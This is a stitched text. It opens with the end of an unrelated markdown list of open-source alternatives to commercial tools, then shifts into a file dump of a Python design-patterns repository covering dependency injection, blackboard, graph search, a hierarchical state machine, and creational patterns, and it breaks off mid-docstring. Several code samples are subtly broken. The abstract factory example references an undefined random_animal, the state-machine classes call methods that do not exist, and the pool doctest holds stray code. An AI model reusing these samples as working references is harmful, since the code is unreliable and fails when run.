width=150/></a>|[Hightouch](https://www.hightouch.io/), [NewRelic](https://newrelic.com/) Reverse ETL|[Grouparoo](https://www.grouparoo.com/)|Data synchronization framework|<a href=https://github.com/grouparoo/grouparoo><img src="https://img.shields.io/github/stars/grouparoo/grouparoo?style=social" width=150/></a>|[Hightouch](https://www.hightouch.io/) Robotic Process Automation (RPA)|[RoboCorp](https://robocorp.com/)|Set of tooling that allows to create automation packages|<a href=https://github.com/robocorp/rcc><img src="https://img.shields.io/github/stars/robocorp/rcc?style=social" width=150/></a>|[UiPath](https://www.uipath.com/) Scheduling|[Cal.com](https://cal.com/)|Scheduling infrastructure, alternative to Calendly|<a href=https://github.com/calendso/calendso><img src="https://img.shields.io/github/stars/calendso/calendso?style=social" width=150/></a>|[Calendly](https://calendly.com/) Session replay software|[OpenReplay](https://openreplay.com/)|Session replay stack for developers|<a href=https://github.com/openreplay/openreplay><img src="https://img.shields.io/github/stars/openreplay/openreplay?style=social" width=150/></a>|[LogRocket](https://logrocket.com/), [FullStory](https://www.fullstory.com/) Social Media|[Postiz](https://postiz.com)|Self-hosted social media scheduling tool|<a href=https://github.com/gitroomhq/postiz-app><img src="https://img.shields.io/github/stars/gitroomhq/postiz-app?style=social" width=150/></a>|[Buffer](https://buffer.com/), [Hootsuite](https://hootsuite.com/) Streaming|[Glimesh](https://glimesh.tv/)|Live streaming platform|<a href=https://github.com/glimesh/glimesh.tv><img src="https://img.shields.io/github/stars/glimesh/glimesh.tv?style=social" width=150/></a>|[Twitch](https://www.twitch.tv/) Timeseries database|[CrateDB](https://crate.io/)|Distributed SQL database for real-time analytics of time series data|<a href="https://github.com/crate/crate"><img src="https://img.shields.io/github/stars/crate/crate?style=social" width=150/></a>|[Kdb+](https://kx.com/developers/) Timeseries database|[InfluxDB](https://www.influxdata.com/)|Database designed to process time series data|<a href=https://github.com/influxdata/influxdb><img src="https://img.shields.io/github/stars/influxdata/influxdb?style=social" width=150/></a>|[Kdb+](https://kx.com/developers/) Timeseries database|[QuestDB](https://questdb.io/)|Database designed to process time series data|<a href=https://github.com/questdb/questdb><img src="https://img.shields.io/github/stars/questdb/questdb?style=social" width=150/></a>|[Kdb+](https://kx.com/developers/) Timeseries database|[TDengine](https://tdengine.com/?en)|Database designed to process time series data|<a href=https://github.com/taosdata/TDengine><img src="https://img.shields.io/github/stars/taosdata/TDengine?style=social" width=150/></a>|[Kdb+](https://kx.com/developers/) Timeseries database|[TimescaleDB](https://www.timescale.com/)|Database designed to process time series data|<a href=https://github.com/timescale/timescaledb><img src="https://img.shields.io/github/stars/timescale/timescaledb?style=social" width=150/></a>|[Kdb+](https://kx.com/developers/) Tunnelling|[Tunnelmole](https://tunnelmole.com/)|Get a Public URL for your local development enviornment |<a href=https://github.com/robbie-cahill/tunnelmole-client><img src="https://img.shields.io/github/stars/robbie-cahill/tunnelmole-client?style=social" width=150/>|</a>[Ngrok](https://ngrok.com) VPN as a Service|[OmniEdge](https://omniedge.io/)|No-code P2P layer-2 mesh VPN for enterprise with zero config |<a href=https://github.com/omniedgeio/omniedge><img src="https://img.shields.io/github/stars/omniedgeio/omniedge?style=social" width=150/></a>|[OpenVPN](https://openvpn.net), [Ngrok](https://ngrok.com), [Oray](https://www.oray.com), [AWS VPC](https://aws.amazon.com/vpc/)| Video Conferencing|[Jitsi](https://jitsi.org/meet)|Video conferences platform and SDK|<a href=https://github.com/jitsi/jitsi-meet><img src="https://img.shields.io/github/stars/jitsi/jitsi-meet?style=social" width=150/></a>|[Zoom](https://zoom.us/)| Video Conferencing|[LiveKit](https://livekit.io/)|SFU and SDKs for high-performance, scalable WebRTC|<a href=https://github.com/livekit/livekit-server><img src="https://img.shields.io/github/stars/livekit/livekit-server?style=social" width=150/></a>|[Twilio](https://www.twilio.com/), [Agora](https://agora.io/)| Video Conferencing|[OpenVidu](https://openvidu.io/)|Platform and SDKs to build on-premises WebRTC video conferences|<a href=https://github.com/OpenVidu/openvidu><img src="https://img.shields.io/github/stars/OpenVidu/openvidu?style=social" width=150/></a>|[Twilio](https://www.twilio.com/)| Webhooks|[Svix](https://www.svix.com/)|Webhooks as a Service|<a href=https://github.com/svix/svix-webhooks><img src="https://img.shields.io/github/stars/Svix/svix-webhooks?style=social" width=150/></a>|[Pusher](https://pusher.com/)| Website analytics|[GoatCounter](https://www.goatcounter.com/)|Google Analytics alternative|<a href=https://github.com/arp242/goatcounter><img src="https://img.shields.io/github/stars/arp242/goatcounter?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/) Website analytics|[Matomo](https://matomo.org/)|Google Analytics alternative|<a href=https://github.com/matomo-org/matomo><img src="https://img.shields.io/github/stars/matomo-org/matomo?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/) Website analytics|[Plausible](https://plausible.io/)|Google Analytics alternative|<a href=https://github.com/plausible/analytics><img src="https://img.shields.io/github/stars/plausible/analytics?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/) Website analytics|[Swetrix](https://swetrix.com)|Google Analytics alternative|<a href=https://github.com/swetrix/swetrix-js><img src="https://img.shields.io/github/stars/swetrix/swetrix-js?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/)| Website analytics|[Umami](https://umami.is)|Google Analytics alternative|<a href=https://github.com/mikecao/umami><img src="https://img.shields.io/github/stars/mikecao/umami?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/) Workflow automation| [Activepieces](https://www.activepieces.com) | No-code business automation tool |<a href=https://github.com/activepieces/activepieces><img src="https://img.shields.io/github/stars/activepieces/activepieces?style=social" width=150/></a> |[Zapier](https://www.zapier.com/), [Tray](https://tray.io/) Workflow automation|[N8N](https://n8n.io/)|Node-based workflow automation tool for developers|<a href=https://github.com/n8n-io/n8n><img src="https://img.shields.io/github/stars/n8n-io/n8n?style=social" width=150/></a>|[Zapier](https://zapier.com/) Workflow automation|[Pipedream](https://pipedream.com/)|Workflow automation and API integration platform|<a href=https://github.com/PipedreamHQ/pipedream><img src="https://img.shields.io/github/stars/PipedreamHQ/pipedream?style=social" width=150/></a>|[Zapier](https://zapier.com/), [Integromat](https://www.integromat.com/)| Workflow automation|[Temporal](https://temporal.io/)|Workflows as code platform|<a href=https://github.com/temporalio/temporal><img src="https://img.shields.io/github/stars/temporalio/temporal?style=social" width=150/></a>|[Zapier](https://zapier.com/) <!-- END STARTUP LIST --> ## Useful Links - Great [article](https://rajko-rad.medium.com/the-rise-of-open-source-challengers-4a3d93932425) on open-source challengers by Rajko Radovanovic
python-patterns
328b2d469e92d6a0dfe17d37d3b180412723db45
File: setup.py from setuptools import find_packages, setup setup( name="patterns", packages=find_packages(), description="A collection of design patterns and idioms in Python.", classifiers=[ "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", ], ) File: patterns/dependency_injection.py """ Dependency Injection (DI) is a technique whereby one object supplies the dependencies (services) to another object (client). It allows to decouple objects: no need to change client code simply because an object it depends on needs to be changed to a different one. (Open/Closed principle) Port of the Java example of Dependency Injection" in "xUnit Test Patterns - Refactoring Test Code" by Gerard Meszaros (ISBN-10: 0131495054, ISBN-13: 978-0131495050) In the following example `time_provider` (service) is embedded into TimeDisplay (client). If such service performed an expensive operation you would like to substitute or mock it in tests. class TimeDisplay(object): def __init__(self): self.time_provider = datetime.datetime.now def get_current_time_as_html_fragment(self): current_time = self.time_provider() current_time_as_html_fragment = "<span class=\"tinyBoldText\">{}</span>".format(current_time) return current_time_as_html_fragment """ import datetime from typing import Callable class ConstructorInjection: def __init__(self, time_provider: Callable) -> None: self.time_provider = time_provider def get_current_time_as_html_fragment(self) -> str: current_time = self.time_provider() current_time_as_html_fragment = '<span class="tinyBoldText">{}</span>'.format( current_time ) return current_time_as_html_fragment class ParameterInjection: def __init__(self) -> None: pass def get_current_time_as_html_fragment(self, time_provider: Callable) -> str: current_time = time_provider() current_time_as_html_fragment = '<span class="tinyBoldText">{}</span>'.format( current_time ) return current_time_as_html_fragment class SetterInjection: """Setter Injection""" def __init__(self): pass def set_time_provider(self, time_provider: Callable): self.time_provider = time_provider def get_current_time_as_html_fragment(self): current_time = self.time_provider() current_time_as_html_fragment = '<span class="tinyBoldText">{}</span>'.format( current_time ) return current_time_as_html_fragment def production_code_time_provider() -> str: """ Production code version of the time provider (just a wrapper for formatting datetime for this example). """ current_time = datetime.datetime.now() current_time_formatted = f"{current_time.hour}:{current_time.minute}" return current_time_formatted def midnight_time_provider() -> str: """Hard-coded stub""" return "24:01" def main(): """ >>> time_with_ci1 = ConstructorInjection(midnight_time_provider) >>> time_with_ci1.get_current_time_as_html_fragment() '<span class="tinyBoldText">24:01</span>' >>> time_with_ci2 = ConstructorInjection(production_code_time_provider) >>> time_with_ci2.get_current_time_as_html_fragment() '<span class="tinyBoldText">...</span>' >>> time_with_pi = ParameterInjection() >>> time_with_pi.get_current_time_as_html_fragment(midnight_time_provider) '<span class="tinyBoldText">24:01</span>' >>> time_with_si = SetterInjection() >>> time_with_si.get_current_time_as_html_fragment() Traceback (most recent call last): ... AttributeError: 'SetterInjection' object has no attribute 'time_provider' >>> time_with_si.set_time_provider(midnight_time_provider) >>> time_with_si.get_current_time_as_html_fragment() '<span class="tinyBoldText">24:01</span>' """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/__init__.py File: patterns/other/blackboard.py """ @author: Eugene Duboviy <[email protected]> | github.com/duboviy In Blackboard pattern several specialised sub-systems (knowledge sources) assemble their knowledge to build a possibly partial or approximate solution. In this way, the sub-systems work together to solve the problem, where the solution is the sum of its parts. https://en.wikipedia.org/wiki/Blackboard_system """ from __future__ import annotations import abc import random class Blackboard: def __init__(self) -> None: self.experts = [] self.common_state = { "problems": 0, "suggestions": 0, "contributions": [], "progress": 0, # percentage, if 100 -> task is finished } def add_expert(self, expert: AbstractExpert) -> None: self.experts.append(expert) class Controller: def __init__(self, blackboard: Blackboard) -> None: self.blackboard = blackboard def run_loop(self): """ This function is a loop that runs until the progress reaches 100. It checks if an expert is eager to contribute and then calls its contribute method. """ while self.blackboard.common_state["progress"] < 100: for expert in self.blackboard.experts: if expert.is_eager_to_contribute: expert.contribute() return self.blackboard.common_state["contributions"] class AbstractExpert(metaclass=abc.ABCMeta): def __init__(self, blackboard: Blackboard) -> None: self.blackboard = blackboard @property @abc.abstractmethod def is_eager_to_contribute(self): raise NotImplementedError("Must provide implementation in subclass.") @abc.abstractmethod def contribute(self): raise NotImplementedError("Must provide implementation in subclass.") class Student(AbstractExpert): @property def is_eager_to_contribute(self) -> bool: return True def contribute(self) -> None: self.blackboard.common_state["problems"] += random.randint(1, 10) self.blackboard.common_state["suggestions"] += random.randint(1, 10) self.blackboard.common_state["contributions"] += [self.__class__.__name__] self.blackboard.common_state["progress"] += random.randint(1, 2) class Scientist(AbstractExpert): @property def is_eager_to_contribute(self) -> int: return random.randint(0, 1) def contribute(self) -> None: self.blackboard.common_state["problems"] += random.randint(10, 20) self.blackboard.common_state["suggestions"] += random.randint(10, 20) self.blackboard.common_state["contributions"] += [self.__class__.__name__] self.blackboard.common_state["progress"] += random.randint(10, 30) class Professor(AbstractExpert): @property def is_eager_to_contribute(self) -> bool: return True if self.blackboard.common_state["problems"] > 100 else False def contribute(self) -> None: self.blackboard.common_state["problems"] += random.randint(1, 2) self.blackboard.common_state["suggestions"] += random.randint(10, 20) self.blackboard.common_state["contributions"] += [self.__class__.__name__] self.blackboard.common_state["progress"] += random.randint(10, 100) def main(): """ >>> blackboard = Blackboard() >>> blackboard.add_expert(Student(blackboard)) >>> blackboard.add_expert(Scientist(blackboard)) >>> blackboard.add_expert(Professor(blackboard)) >>> c = Controller(blackboard) >>> contributions = c.run_loop() >>> from pprint import pprint >>> pprint(contributions) ['Student', 'Student', 'Student', 'Student', 'Scientist', 'Student', 'Student', 'Student', 'Scientist', 'Student', 'Scientist', 'Student', 'Student', 'Scientist', 'Professor'] """ if __name__ == "__main__": random.seed(1234) # for deterministic doctest outputs import doctest doctest.testmod() File: patterns/other/__init__.py File: patterns/other/graph_search.py class GraphSearch: """Graph search emulation in python, from source http://www.python.org/doc/essays/graphs/ dfs stands for Depth First Search bfs stands for Breadth First Search""" def __init__(self, graph): self.graph = graph def find_path_dfs(self, start, end, path=None): path = path or [] path.append(start) if start == end: return path for node in self.graph.get(start, []): if node not in path: newpath = self.find_path_dfs(node, end, path[:]) if newpath: return newpath def find_all_paths_dfs(self, start, end, path=None): path = path or [] path.append(start) if start == end: return [path] paths = [] for node in self.graph.get(start, []): if node not in path: newpaths = self.find_all_paths_dfs(node, end, path[:]) paths.extend(newpaths) return paths def find_shortest_path_dfs(self, start, end, path=None): path = path or [] path.append(start) if start == end: return path shortest = None for node in self.graph.get(start, []): if node not in path: newpath = self.find_shortest_path_dfs(node, end, path[:]) if newpath: if not shortest or len(newpath) < len(shortest): shortest = newpath return shortest def find_shortest_path_bfs(self, start, end): """ Finds the shortest path between two nodes in a graph using breadth-first search. :param start: The node to start from. :type start: str or int :param end: The node to find the shortest path to. :type end: str or int :returns queue_path_to_end, dist_to[end]: A list of nodes representing the shortest path from `start` to `end`, and a dictionary mapping each node in the graph (except for `start`) with its distance from it (in terms of hops). If no such path exists, returns an empty list and an empty dictionary instead. """ queue = [start] dist_to = {start: 0} edge_to = {} if start == end: return queue while len(queue): value = queue.pop(0) for node in self.graph[value]: if node not in dist_to.keys(): edge_to[node] = value dist_to[node] = dist_to[value] + 1 queue.append(node) if end in edge_to.keys(): path = [] node = end while dist_to[node] != 0: path.insert(0, node) node = edge_to[node] path.insert(0, start) return path def main(): """ # example of graph usage >>> graph = { ... 'A': ['B', 'C'], ... 'B': ['C', 'D'], ... 'C': ['D', 'G'], ... 'D': ['C'], ... 'E': ['F'], ... 'F': ['C'], ... 'G': ['E'], ... 'H': ['C'] ... } # initialization of new graph search object >>> graph_search = GraphSearch(graph) >>> print(graph_search.find_path_dfs('A', 'D')) ['A', 'B', 'C', 'D'] # start the search somewhere in the middle >>> print(graph_search.find_path_dfs('G', 'F')) ['G', 'E', 'F'] # unreachable node >>> print(graph_search.find_path_dfs('C', 'H')) None # non existing node >>> print(graph_search.find_path_dfs('C', 'X')) None >>> print(graph_search.find_all_paths_dfs('A', 'D')) [['A', 'B', 'C', 'D'], ['A', 'B', 'D'], ['A', 'C', 'D']] >>> print(graph_search.find_shortest_path_dfs('A', 'D')) ['A', 'B', 'D'] >>> print(graph_search.find_shortest_path_dfs('A', 'F')) ['A', 'C', 'G', 'E', 'F'] >>> print(graph_search.find_shortest_path_bfs('A', 'D')) ['A', 'B', 'D'] >>> print(graph_search.find_shortest_path_bfs('A', 'F')) ['A', 'C', 'G', 'E', 'F'] # start the search somewhere in the middle >>> print(graph_search.find_shortest_path_bfs('G', 'F')) ['G', 'E', 'F'] # unreachable node >>> print(graph_search.find_shortest_path_bfs('A', 'H')) None # non existing node >>> print(graph_search.find_shortest_path_bfs('A', 'X')) None """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/other/hsm/hsm.py """ Implementation of the HSM (hierarchical state machine) or NFSM (nested finite state machine) C++ example from http://www.eventhelix.com/RealtimeMantra/HierarchicalStateMachine.htm#.VwqLVEL950w in Python - single source 'message type' for state transition changes - message type considered, messages (comment) not considered to avoid complexity """ class UnsupportedMessageType(BaseException): pass class UnsupportedState(BaseException): pass class UnsupportedTransition(BaseException): pass class HierachicalStateMachine: def __init__(self): self._active_state = Active(self) # Unit.Inservice.Active() self._standby_state = Standby(self) # Unit.Inservice.Standby() self._suspect_state = Suspect(self) # Unit.OutOfService.Suspect() self._failed_state = Failed(self) # Unit.OutOfService.Failed() self._current_state = self._standby_state self.states = { "active": self._active_state, "standby": self._standby_state, "suspect": self._suspect_state, "failed": self._failed_state, } self.message_types = { "fault trigger": self._current_state.on_fault_trigger, "switchover": self._current_state.on_switchover, "diagnostics passed": self._current_state.on_diagnostics_passed, "diagnostics failed": self._current_state.on_diagnostics_failed, "operator inservice": self._current_state.on_operator_inservice, } def _next_state(self, state): try: self._current_state = self.states[state] except KeyError: raise UnsupportedState def _send_diagnostics_request(self): return "send diagnostic request" def _raise_alarm(self): return "raise alarm" def _clear_alarm(self): return "clear alarm" def _perform_switchover(self): return "perform switchover" def _send_switchover_response(self): return "send switchover response" def _send_operator_inservice_response(self): return "send operator inservice response" def _send_diagnostics_failure_report(self): return "send diagnostics failure report" def _send_diagnostics_pass_report(self): return "send diagnostics pass report" def _abort_diagnostics(self): return "abort diagnostics" def _check_mate_status(self): return "check mate status" def on_message(self, message_type): # message ignored if message_type in self.message_types.keys(): self.message_types[message_type]() else: raise UnsupportedMessageType class Unit: def __init__(self, HierachicalStateMachine): self.hsm = HierachicalStateMachine def on_switchover(self): raise UnsupportedTransition def on_fault_trigger(self): raise UnsupportedTransition def on_diagnostics_failed(self): raise UnsupportedTransition def on_diagnostics_passed(self): raise UnsupportedTransition def on_operator_inservice(self): raise UnsupportedTransition class Inservice(Unit): def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine def on_fault_trigger(self): self._hsm._next_state("suspect") self._hsm._send_diagnostics_request() self._hsm._raise_alarm() def on_switchover(self): self._hsm._perform_switchover() self._hsm._check_mate_status() self._hsm._send_switchover_response() class Active(Inservice): def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine def on_fault_trigger(self): super().perform_switchover() super().on_fault_trigger() def on_switchover(self): self._hsm.on_switchover() # message ignored self._hsm.next_state("standby") class Standby(Inservice): def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine def on_switchover(self): super().on_switchover() # message ignored self._hsm._next_state("active") class OutOfService(Unit): def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine def on_operator_inservice(self): self._hsm.on_switchover() # message ignored self._hsm.send_operator_inservice_response() self._hsm.next_state("suspect") class Suspect(OutOfService): def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine def on_diagnostics_failed(self): super().send_diagnostics_failure_report() super().next_state("failed") def on_diagnostics_passed(self): super().send_diagnostics_pass_report() super().clear_alarm() # loss of redundancy alarm super().next_state("standby") def on_operator_inservice(self): super().abort_diagnostics() super().on_operator_inservice() # message ignored class Failed(OutOfService): """No need to override any method.""" def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine File: patterns/other/hsm/__init__.py File: patterns/creational/abstract_factory.py """ *What is this pattern about? In Java and other languages, the Abstract Factory Pattern serves to provide an interface for creating related/dependent objects without need to specify their actual class. The idea is to abstract the creation of objects depending on business logic, platform choice, etc. In Python, the interface we use is simply a callable, which is "builtin" interface in Python, and in normal circumstances we can simply use the class itself as that callable, because classes are first class objects in Python. *What does this example do? This particular implementation abstracts the creation of a pet and does so depending on the factory we chose (Dog or Cat, or random_animal) This works because both Dog/Cat and random_animal respect a common interface (callable for creation and .speak()). Now my application can create pets abstractly and decide later, based on my own criteria, dogs over cats. *Where is the pattern used practically? *References: https://sourcemaking.com/design_patterns/abstract_factory http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/ *TL;DR Provides a way to encapsulate a group of individual factories. """ import random from typing import Type class Pet: def __init__(self, name: str) -> None: self.name = name def speak(self) -> None: raise NotImplementedError def __str__(self) -> str: raise NotImplementedError class Dog(Pet): def speak(self) -> None: print("woof") def __str__(self) -> str: return f"Dog<{self.name}>" class Cat(Pet): def speak(self) -> None: print("meow") def __str__(self) -> str: return f"Cat<{self.name}>" class PetShop: """A pet shop""" def __init__(self, animal_factory: Type[Pet]) -> None: """pet_factory is our abstract factory. We can set it at will.""" self.pet_factory = animal_factory def buy_pet(self, name: str) -> Pet: """Creates and shows a pet using the abstract factory""" pet = self.pet_factory(name) print(f"Here is your lovely {pet}") return pet # Show pets with various factories def main() -> None: """ # A Shop that sells only cats >>> cat_shop = PetShop(Cat) >>> pet = cat_shop.buy_pet("Lucy") Here is your lovely Cat<Lucy> >>> pet.speak() meow """ if __name__ == "__main__": shop = PetShop(random_animal) import doctest doctest.testmod() File: patterns/creational/__init__.py File: patterns/creational/factory.py """*What is this pattern about? A Factory is an object for creating other objects. *What does this example do? The code shows a way to localize words in two languages: English and Greek. "get_localizer" is the factory function that constructs a localizer depending on the language chosen. The localizer object will be an instance from a different class according to the language localized. However, the main code does not have to worry about which localizer will be instantiated, since the method "localize" will be called in the same way independently of the language. *Where can the pattern be used practically? The Factory Method can be seen in the popular web framework Django: https://docs.djangoproject.com/en/4.0/topics/forms/formsets/ For example, different types of forms are created using a formset_factory *References: http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/ *TL;DR Creates objects without having to specify the exact class. """ from typing import Dict, Protocol, Type class Localizer(Protocol): def localize(self, msg: str) -> str: pass class GreekLocalizer: """A simple localizer a la gettext""" def __init__(self) -> None: self.translations = {"dog": "σκύλος", "cat": "γάτα"} def localize(self, msg: str) -> str: """We'll punt if we don't have a translation""" return self.translations.get(msg, msg) class EnglishLocalizer: """Simply echoes the message""" def localize(self, msg: str) -> str: return msg def get_localizer(language: str = "English") -> Localizer: """Factory""" localizers: Dict[str, Type[Localizer]] = { "English": EnglishLocalizer, "Greek": GreekLocalizer, } return localizers[language]() def main(): """ # Create our localizers >>> e, g = get_localizer(language="English"), get_localizer(language="Greek") # Localize some text >>> for msg in "dog parrot cat bear".split(): ... print(e.localize(msg), g.localize(msg)) dog σκύλος parrot parrot cat γάτα bear bear """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/creational/builder.py """ *What is this pattern about? It decouples the creation of a complex object and its representation, so that the same process can be reused to build objects from the same family. This is useful when you must separate the specification of an object from its actual representation (generally for abstraction). *What does this example do? The first example achieves this by using an abstract base class for a building, where the initializer (__init__ method) specifies the steps needed, and the concrete subclasses implement these steps. In other programming languages, a more complex arrangement is sometimes necessary. In particular, you cannot have polymorphic behaviour in a constructor in C++ - see https://stackoverflow.com/questions/1453131/how-can-i-get-polymorphic-behavior-in-a-c-constructor - which means this Python technique will not work. The polymorphism required has to be provided by an external, already constructed instance of a different class. In general, in Python this won't be necessary, but a second example showing this kind of arrangement is also included. *Where is the pattern used practically? *References: https://sourcemaking.com/design_patterns/builder *TL;DR Decouples the creation of a complex object and its representation. """ # Abstract Building class Building: def __init__(self) -> None: self.build_floor() self.build_size() def build_floor(self): raise NotImplementedError def build_size(self): raise NotImplementedError def __repr__(self) -> str: return "Floor: {0.floor} | Size: {0.size}".format(self) # Concrete Buildings class House(Building): def build_floor(self) -> None: self.floor = "One" def build_size(self) -> None: self.size = "Big" class Flat(Building): def build_floor(self) -> None: self.floor = "More than One" def build_size(self) -> None: self.size = "Small" # In some very complex cases, it might be desirable to pull out the building # logic into another function (or a method on another class), rather than being # in the base class '__init__'. (This leaves you in the strange situation where # a concrete class does not have a useful constructor) class ComplexBuilding: def __repr__(self) -> str: return "Floor: {0.floor} | Size: {0.size}".format(self) class ComplexHouse(ComplexBuilding): def build_floor(self) -> None: self.floor = "One" def build_size(self) -> None: self.size = "Big and fancy" def construct_building(cls) -> Building: building = cls() building.build_floor() building.build_size() return building def main(): """ >>> house = House() >>> house Floor: One | Size: Big >>> flat = Flat() >>> flat Floor: More than One | Size: Small # Using an external constructor function: >>> complex_house = construct_building(ComplexHouse) >>> complex_house Floor: One | Size: Big and fancy """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/creational/lazy_evaluation.py """ Lazily-evaluated property pattern in Python. https://en.wikipedia.org/wiki/Lazy_evaluation *References: bottle https://github.com/bottlepy/bottle/blob/cafc15419cbb4a6cb748e6ecdccf92893bb25ce5/bottle.py#L270 django https://github.com/django/django/blob/ffd18732f3ee9e6f0374aff9ccf350d85187fac2/django/utils/functional.py#L19 pip https://github.com/pypa/pip/blob/cb75cca785629e15efb46c35903827b3eae13481/pip/utils/__init__.py#L821 pyramid https://github.com/Pylons/pyramid/blob/7909e9503cdfc6f6e84d2c7ace1d3c03ca1d8b73/pyramid/decorator.py#L4 werkzeug https://github.com/pallets/werkzeug/blob/5a2bf35441006d832ab1ed5a31963cbc366c99ac/werkzeug/utils.py#L35 *TL;DR Delays the eval of an expr until its value is needed and avoids repeated evals. """ import functools class lazy_property: def __init__(self, function): self.function = function functools.update_wrapper(self, function) def __get__(self, obj, type_): if obj is None: return self val = self.function(obj) obj.__dict__[self.function.__name__] = val return val def lazy_property2(fn): """ A lazy property decorator. The function decorated is called the first time to retrieve the result and then that calculated result is used the next time you access the value. """ attr = "_lazy__" + fn.__name__ @property def _lazy_property(self): if not hasattr(self, attr): setattr(self, attr, fn(self)) return getattr(self, attr) return _lazy_property class Person: def __init__(self, name, occupation): self.name = name self.occupation = occupation self.call_count2 = 0 @lazy_property def relatives(self): # Get all relatives, let's assume that it costs much time. relatives = "Many relatives." return relatives @lazy_property2 def parents(self): self.call_count2 += 1 return "Father and mother" def main(): """ >>> Jhon = Person('Jhon', 'Coder') >>> Jhon.name 'Jhon' >>> Jhon.occupation 'Coder' # Before we access `relatives` >>> sorted(Jhon.__dict__.items()) [('call_count2', 0), ('name', 'Jhon'), ('occupation', 'Coder')] >>> Jhon.relatives 'Many relatives.' # After we've accessed `relatives` >>> sorted(Jhon.__dict__.items()) [('call_count2', 0), ..., ('relatives', 'Many relatives.')] >>> Jhon.parents 'Father and mother' >>> sorted(Jhon.__dict__.items()) [('_lazy__parents', 'Father and mother'), ('call_count2', 1), ..., ('relatives', 'Many relatives.')] >>> Jhon.parents 'Father and mother' >>> Jhon.call_count2 1 """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/creational/prototype.py """ *What is this pattern about? This patterns aims to reduce the number of classes required by an application. Instead of relying on subclasses it creates objects by copying a prototypical instance at run-time. This is useful as it makes it easier to derive new kinds of objects, when instances of the class have only a few different combinations of state, and when instantiation is expensive. *What does this example do? When the number of prototypes in an application can vary, it can be useful to keep a Dispatcher (aka, Registry or Manager). This allows clients to query the Dispatcher for a prototype before cloning a new instance. Below provides an example of such Dispatcher, which contains three copies of the prototype: 'default', 'objecta' and 'objectb'. *TL;DR Creates new object instances by cloning prototype. """ from __future__ import annotations from typing import Any class Prototype: def __init__(self, value: str = "default", **attrs: Any) -> None: self.value = value self.__dict__.update(attrs) def clone(self, **attrs: Any) -> Prototype: """Clone a prototype and update inner attributes dictionary""" # Python in Practice, Mark Summerfield # copy.deepcopy can be used instead of next line. obj = self.__class__(**self.__dict__) obj.__dict__.update(attrs) return obj class PrototypeDispatcher: def __init__(self): self._objects = {} def get_objects(self) -> dict[str, Prototype]: """Get all objects""" return self._objects def register_object(self, name: str, obj: Prototype) -> None: """Register an object""" self._objects[name] = obj def unregister_object(self, name: str) -> None: """Unregister an object""" del self._objects[name] def main() -> None: """ >>> dispatcher = PrototypeDispatcher() >>> prototype = Prototype() >>> d = prototype.clone() >>> a = prototype.clone(value='a-value', category='a') >>> b = a.clone(value='b-value', is_checked=True) >>> dispatcher.register_object('objecta', a) >>> dispatcher.register_object('objectb', b) >>> dispatcher.register_object('default', d) >>> [{n: p.value} for n, p in dispatcher.get_objects().items()] [{'objecta': 'a-value'}, {'objectb': 'b-value'}, {'default': 'default'}] >>> print(b.category, b.is_checked) a True """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/creational/pool.py """ *What is this pattern about? This pattern is used when creating an object is costly (and they are created frequently) but only a few are used at a time. With a Pool we can manage those instances we have as of now by caching them. Now it is possible to skip the costly creation of an object if one is available in the pool. A pool allows to 'check out' an inactive object and then to return it. If none are available the pool creates one to provide without wait. *What does this example do? In this example queue.Queue is used to create the pool (wrapped in a custom ObjectPool object to use with the with statement), and it is populated with strings. As we can see, the first string object put in "yam" is USED by the with statement. But because it is released back into the pool afterwards it is reused by the explicit call to sample_queue.get(). Same thing happens with "sam", when the ObjectPool created inside the function is deleted (by the GC) and the object is returned. *Where is the pattern used practically? *References: http://stackoverflow.com/questions/1514120/python-implementation-of-the-object-pool-design-pattern https://sourcemaking.com/design_patterns/object_pool *TL;DR Stores a set of initialized objects kept ready to use. """ class ObjectPool: def __init__(self, queue, auto_get=False): self._queue = queue self.item = self._queue.get() if auto_get else None def __enter__(self): if self.item is None: self.item = self._queue.get() return self.item def __exit__(self, Type, value, traceback): if self.item is not None: self._queue.put(self.item) self.item = None def __del__(self): if self.item is not None: self._queue.put(self.item) self.item = None def main(): """ >>> import queue >>> def test_object(queue): ... pool = ObjectPool(queue, True) ... print('Inside func: {}'.format(pool.item)) >>> sample_queue = queue.Queue() >>> sample_queue.put('yam') >>> with ObjectPool(sample_queue) as obj: ... print('Inside with: {}'.format(obj)) Inside with: yam >>> print('Outside with: {}'.format(sample_queue.get())) Outside with: yam >>> sample_queue.put('sam') >>> test_object(sample_queue) Inside func: sam >>> print('Outside func: {}'.format(sample_queue.get())) Outside func: sam if not sample_queue.empty(): print(sample_queue.get()) """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/creational/borg.py """ *What is this pattern about? The Borg pattern (also known as the Monostate pattern) is a way to implement singleton behavior, but instead of having only one instance of a class, there are multiple instances that share the same state. In other words, the focus is on sharing state instead of sharing instance identity. *What does this example do? To understand the implementation of this pattern in Python, it is important to know that, in Python, instance attributes are stored in a attribute dictionary called __dict__. Usually, each instance will have its own dictionary, but the Borg pattern modifies this so that all instances have the same dictionary. In this example, the __shared_state attribute will be the dictionary shared between all instances, and this is ensured by assigning __shared_state to the __dict__ variable when initializing a new instance (i.e., in the __init__ method). Other attributes are usually added to the instance's attribute dictionary, but, since the attribute dictionary itself is shared (which is __shared_state), all other attributes will also be shared. *Where is the pattern used practically? Sharing state is useful in applications like managing database connections: 